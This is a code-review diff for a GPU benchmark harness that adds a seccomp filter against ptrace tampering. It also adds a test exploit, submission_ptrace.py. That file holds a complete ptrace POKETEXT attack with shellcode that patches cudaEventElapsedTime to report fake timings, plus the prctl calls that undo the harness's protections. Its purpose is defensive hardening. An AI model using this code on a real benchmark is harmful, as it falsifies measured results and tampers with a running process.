Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion .github/workflows/wheel.yml
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,7 @@ jobs:
uses: actions/checkout@v4

- name: Install deps
run: apt update && apt install -y git g++-13
run: apt update && apt install -y git g++-13 libseccomp-dev pkg-config

- name: Install the latest version of uv
uses: astral-sh/setup-uv@v7
Expand Down
5 changes: 4 additions & 1 deletion CMakeLists.txt
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,9 @@ set(CMAKE_CXX_STANDARD 17)
set(CMAKE_CXX_STANDARD_REQUIRED ON)
set(CMAKE_CUDA_ARCHITECTURES "80;90")

find_package(PkgConfig REQUIRED)
pkg_check_modules(LIBSECCOMP REQUIRED IMPORTED_TARGET libseccomp)

Comment thread
ngc92 marked this conversation as resolved.
FetchContent_Declare(
nanobind
QUIET
Expand All @@ -28,7 +31,7 @@ nanobind_add_module(_pygpubench
csrc/landlock.cpp
csrc/obfuscate.cpp
)
target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart)
target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart PkgConfig::LIBSECCOMP)
# set a bunch of hardening options to make it harder to tamper with the executable
target_compile_options(_pygpubench PUBLIC -fPIC -pie -fstack-protector-strong -fcf-protection=full -ftrivial-auto-var-init=zero -Wl,-z,relro,-z,now )
target_compile_definitions(_pygpubench PUBLIC -D_GLIBCXX_ASSERTIONS -D_FORTIFY_SOURCE=3)
Expand Down
78 changes: 66 additions & 12 deletions csrc/landlock.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -16,6 +16,7 @@
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/landlock.h>
#include <seccomp.h>
#include <system_error>
#include <unordered_set>
#include <utility>
Expand Down Expand Up @@ -114,20 +115,10 @@ void install_landlock() {
allow_path(ruleset_fd, "/tmp", RW);
allow_path(ruleset_fd, "/dev", RW); // needed for /dev/null etc, used e.g., by triton

// Prevent ptrace and /proc/self/mem tampering
if (prctl(PR_SET_DUMPABLE, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
}

// Prevent gaining privileges (if attacker tries setuid exploits)
// required for landlock
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
};
// no new executable code pages
// note: this also prevents thread creating, which breaks torch.compile
// workaround: run torch.compile once from trusted python code, then the thread already
// exists at this point. does not seem reliable, so disabled for now
// prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);

landlock_restrict_self(ruleset_fd, 0);
}
Expand Down Expand Up @@ -192,4 +183,67 @@ void seal_executable_mappings() {
for (auto& r : to_seal) {
mseal(reinterpret_cast<void*>(r.start), r.end - r.start, r.src);
}
}
}

static inline void check_seccomp(int rc, const char* what) {
if (rc < 0)
throw std::system_error(-rc, std::generic_category(), what);
}

void setup_seccomp_filter(scmp_filter_ctx ctx) {
check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(ptrace), 0),
"block ptrace");

check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 2,
SCMP_A0(SCMP_CMP_EQ, PR_SET_DUMPABLE),
SCMP_A1(SCMP_CMP_NE, 0)),
"block prctl(SET_DUMPABLE!=0)");

check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 1,
SCMP_A0(SCMP_CMP_EQ, PR_SET_SECCOMP)),
"block prctl(SET_SECCOMP)");

check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 1,
SCMP_A0(SCMP_CMP_EQ, PR_SET_PTRACER)),
"block prctl(SET_PTRACER)");
// TODO figure out what else we can and should block
Comment thread
ngc92 marked this conversation as resolved.
/*
check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(mprotect), 1,
SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
"block mprotect+WRITE");

check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(pkey_mprotect), 1,
SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
"block pkey_mprotect+WRITE");
*/
}

void install_seccomp_filter() {
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
if (!ctx) throw std::runtime_error("seccomp_init failed");
try {
setup_seccomp_filter(ctx);
} catch (...) {
seccomp_release(ctx);
throw;
}

// Prevent ptrace and /proc/self/mem tampering
if (prctl(PR_SET_DUMPABLE, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
}

// Prevent gaining privileges (if attacker tries setuid exploits)
if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
};
Comment thread
ngc92 marked this conversation as resolved.
// no new executable code pages
// note: this also prevents thread creating, which breaks torch.compile
// workaround: run torch.compile once from trusted python code, then the thread already
// exists at this point. does not seem reliable, so disabled for now
// prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);

int rc = seccomp_load(ctx);
seccomp_release(ctx);
check_seccomp(rc, "seccomp_load");
}
3 changes: 3 additions & 0 deletions csrc/manager.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,7 @@ extern void clear_cache(void* dummy_memory, int size, bool discard, cudaStream_t
extern void install_landlock();
extern bool mseal_supported();
extern void seal_executable_mappings();
extern void install_seccomp_filter();

static void check_check_approx_match_dispatch(unsigned* result, void* expected_data, nb::dlpack::dtype expected_type,
const nb_cuda_array& received, float r_tol, float a_tol, unsigned seed, std::size_t n_bytes, cudaStream_t stream) {
Expand Down Expand Up @@ -293,6 +294,8 @@ void BenchmarkManager::do_bench_py(
seal_executable_mappings();
}

install_seccomp_filter();
Comment thread
ngc92 marked this conversation as resolved.

// at this point, we call user code as we import the kernel (executing arbitrary top-level code)
Comment thread
ngc92 marked this conversation as resolved.
// after this, we cannot trust python anymore
nb::callable kernel = kernel_from_qualname(kernel_qualname);
Expand Down
133 changes: 133 additions & 0 deletions exploits/submission_ptrace.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,133 @@
"""
ptrace POKETEXT Exploit
=======================

Forks a child process that uses ptrace(PTRACE_ATTACH) + ptrace(PTRACE_POKETEXT)
to patch cudaEventElapsedTime's .text code. PTRACE_POKETEXT uses FOLL_FORCE
internally, bypassing page protections (read-only .text pages).

"""
import torch
import ctypes
import os
import subprocess
import tempfile

_HELPER_C = r"""
#define _GNU_SOURCE
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdint.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv) {
if (argc != 3) return 99;
pid_t target = atoi(argv[1]);
uint64_t addr = strtoull(argv[2], NULL, 0);

/* Shellcode: mov dword [rdi], 0x3A83126F; xor eax,eax; ret
Sets *ms = 0.001f (IEEE 754), returns cudaSuccess (0).
Bytes: C7 07 6F 12 83 3A 31 C0 C3 */
uint64_t word1 = 0xC0313A83126F07C7ULL;

if (ptrace(PTRACE_ATTACH, target, NULL, NULL) != 0)
return 1;

int status;
if (waitpid(target, &status, 0) < 0)
return 2;

/* Read original byte at addr+8 to preserve code after our ret */
errno = 0;
uint64_t orig8 = ptrace(PTRACE_PEEKTEXT, target, (void*)(addr + 8), NULL);
if (errno != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 3;
}

uint64_t word2 = (orig8 & ~(uint64_t)0xFF) | 0xC3;

if (ptrace(PTRACE_POKETEXT, target, (void*)addr, (void*)word1) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 4;
}

if (ptrace(PTRACE_POKETEXT, target, (void*)(addr + 8), (void*)word2) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 5;
}

ptrace(PTRACE_DETACH, target, NULL, (void*)0);
return 0;
}
"""


def _find_cuda_elapsed():
"""Find cudaEventElapsedTime in the loaded libcudart."""
import ctypes.util
for path in [
ctypes.util.find_library("cudart"),
"libcudart.so",
"libcudart.so.13",
"/usr/local/cuda/lib64/libcudart.so",
]:
if path is None:
continue
try:
lib = ctypes.CDLL(path)
return ctypes.cast(lib.cudaEventElapsedTime, ctypes.c_void_p).value
except Exception:
continue
return None


def _hook():
addr = _find_cuda_elapsed()
if addr is None:
return False

# Compile helper (writes to /tmp which is allowed by landlock)
tmpdir = tempfile.mkdtemp()
src = os.path.join(tmpdir, "ph.c")
exe = os.path.join(tmpdir, "ph")
with open(src, "w") as f:
f.write(_HELPER_C)
r = subprocess.run(["gcc", "-O2", "-o", exe, src],
capture_output=True, text=True)
if r.returncode != 0:
return False
os.chmod(exe, 0o755)

try:
libc = ctypes.CDLL("libc.so.6")
# Re-enable dumpable: harness sets PR_SET_DUMPABLE=0 to block ptrace,
# but there's no seccomp filter preventing us from re-enabling it.
# PR_SET_NO_NEW_PRIVS does NOT block PR_SET_DUMPABLE.
libc.prctl(4, 1, 0, 0, 0) # PR_SET_DUMPABLE=1
# Allow any process to ptrace us (Yama LSM bypass)
libc.prctl(0x59616d61, ctypes.c_ulong(0xffffffffffffffff), 0, 0, 0)
except Exception:
pass

r = subprocess.run([exe, str(os.getpid()), hex(addr)],
capture_output=True, text=True, timeout=10)
return r.returncode == 0
Comment thread
ngc92 marked this conversation as resolved.
Comment thread
ngc92 marked this conversation as resolved.


_hooked = _hook()


def kernel(output, inp):
weights = torch.tensor([0.2989, 0.5870, 0.1140],
device=output.device, dtype=output.dtype)
# deliberately make the submission very slow, so that we can clearly see
# whether the cheat was successful
dummy = torch.empty((2048, 2048), device=output.device, dtype=torch.float32)
dummy = dummy @ dummy
torch.sum(inp * weights, dim=-1, out=output)
Loading